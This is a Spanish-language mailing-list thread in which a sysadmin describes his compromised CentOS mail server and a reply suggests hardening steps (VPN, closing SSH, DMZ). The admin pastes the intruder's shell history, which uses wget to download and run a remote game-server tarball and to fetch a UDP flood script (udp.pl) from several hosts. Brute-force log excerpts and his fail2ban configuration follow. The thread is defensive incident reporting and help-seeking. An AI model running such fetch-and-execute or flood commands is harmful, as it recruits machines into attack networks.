Estimado una consulta, cuando dices que tomaron posesión de tu servidor,
finalmente se conectaron por ssh con el usuario que mencionas?? veo que
sacaste el historial de la consola bash del usuario en cuestión, es así?
Si tienes el servicio SSH escuchando al mundo, es muy probable que tengas
que lidiar con este tipo de situaciones, quizás debas considerar
implementar una VPN para administrar tu(s) server(s) desde Internet,
investiga sobre OpenVPN que es una buena solución y además debes cerrar el
servicio SSH a Internet.
Puedes también separar (si las lucas lo permiten) el servicio SMTP del POP
o IMAP que tengas y utilizar usuarios virtuales y autenticarlos contra un
OpenLDAP, además deberías considerar implementar una arquitectura DMZ donde
puedes separar tu FW, Servidores y LAN en zonas distintas, obviamente sólo
si las lucas te lo permiten.
Por lo que vi de las descargas parece estuviste a punto de ser parte una
red de servidores Counter Strike (csservers_redirecte_linux_hlds.tar.gz) y
quizás parte de una red zombie de ataques de negación de servicios (udp.pl).
Saludos!
El 5 de abril de 2013 12:12, Luis Alberto Roman Aguirre
luisroma...@hotmail.com escribió:
Buenas amigos Listeros:
Retomando el tema del servidor de correos, perdón por el retraso, y
agradeciendo por la respuesta a:José María Terry Jiménez,Jesus Armando Uch
Canu,Jose Fernández Rodríguez,Francesc Guitart ...a la LISTA en GENERAL
..y si me olvide de alguien mil disculpas.
Bueno, es comento que los días posteriores fue tanto el escaneo que al
final tomaron posesión de mi servidor a través de un usuario el cual borre
pero nada tuve que formatear el servidor todo de cero de nuevo.Pero todo
esto paso (CREO YO) , por un un usuario el cual descargo y ejecuto este
archivo:
wget
www.csservers.ro/csservers_redirecte_linux_hlds.tar.gz
tar -pxzf csservers_redirecte_linux_hlds.tar.gz
ps x
killall screen
ps x
free -m
screen
cd csservers_redirecte_linux_hlds
./start
cd ..
#wget
http://y2khom3.evonet.ro/udp.pl
#wget
www.buble.biz/alinftp/udp.pl
#wget
www.packetstormsecurity.org/DoS/udp.pl
#ps x
#cd /tmp
#ls -a
#w
Ahora les detallo que ingresaron por un usuario el cual hace reenvio de
correos a nivel local el cual no tenia contraseña, en el nuevo servidor le
puse contraseña a todos los usuarios y demas con
caracteres(mayusculas,minusculas y numeros). Lo que me sorprende fue aun
despues de reinstalar el centos , creo ya que me agarraron de punto ,
porque note que sigo siendo escaneado por la misma lista antes de la
reinstalacion les copio parte y les adjunto en txt:dovecot: Authentication
Failures:base: 1376
Time(s)root: 52
Time(s)postmaster
rhost=190.210.136.21 : 32 Time(s)mlizana
rhost=10.1.0.28 : 20 Time(s)aa
rhost=113.162.161.245 : 18 Time(s)admin
rhost=183.60.20.40 : 14 Time(s)mconde: 10
Time(s)test
rhost=183.60.20.40 : 10 Time(s)admin1
rhost=183.60.20.40 : 8 Time(s)dedicated
rhost=183.60.20.40 : 8 Time(s)html
rhost=183.60.20.40 : 8 Time(s)user1
rhost=183.60.20.40 : 8 Time(s)bdsistemas:
6 Time(s)
La ip segun lo investigado es de China:
http://whatismyipaddress.com/ip/183.60.20.40 y salio esto:(ojo hay otro
router que salio mientras escribía es este http://201.77.5.191/ de
Brazil)General IP
InformationIP:183.60.20.40Decimal:3074167848Hostname:183.60.20.40ISP:ChinaNet
Guangdong Province NetworkOrganization:ChinaNet Guangdong Province
NetworkServices:None detectedType:BroadbandAssignment:Static
IPBlacklist:Geolocation InformationCountry:China
State/Region:GuangdongCity:GuangzhouLatitude:23.1167 (23° 7′ 0.12″
N)Longitude:113.25 (113° 15′ 0.00″ E)
Por recomendación de los ya mencionados amigos instale el fail2ban pero
creo que no hace nada o bien algo estoy haciendo mal ,posteo
configuracion:Jail.conf[dovecot-pop3imap]enabled = truefilter =
dovecot-pop3imapaction = iptables-multiport[name=dovecot-pop3imap,
port=pop3,pop3s,imap,imaps, protocol=tcp]
sendmail-whois[name=dovecot-pop3imap, dest=root, sender=u...@xxx.xxx]logpath
= /var/log/maillogmaxretry = 2#findtime = 600bantime = 5200
En la carpeta filter.d/dovecot-pop3imap.conf tengo
esto:[Definition]failregex = dovecot: auth-worker\(default\):
sql\(.*,HOST\): unknown userdovecot: (pop3|imap)-login:
Aborted login \(.*\): .*, \[HOST\]dovecot: (pop3|imap)-login:
Disconnected \(auth failed, .*\): .*, \[HOST\]dovecot:
auth\(default\): passdb\(.*,HOST\)\: Attempted login with password having
illegal charsdovecot: (pop3|imap)-login: Disconnected \(auth
failed, .*\): .*, \[HOST\]dovecot: (pop3|imap)-login: Aborted
login: .*, \[HOST\]ignoreregex =
La cosa que los escaneos que me hacen al dovecot el fail2ban no tiene
idea de ellos, algo estoy haciendo mal?, estoy por probar el OSSEC, pero
si hay otra herramienta o bien algo mas que se pueda hacer, ya que ser
victima de nuevo y lo peor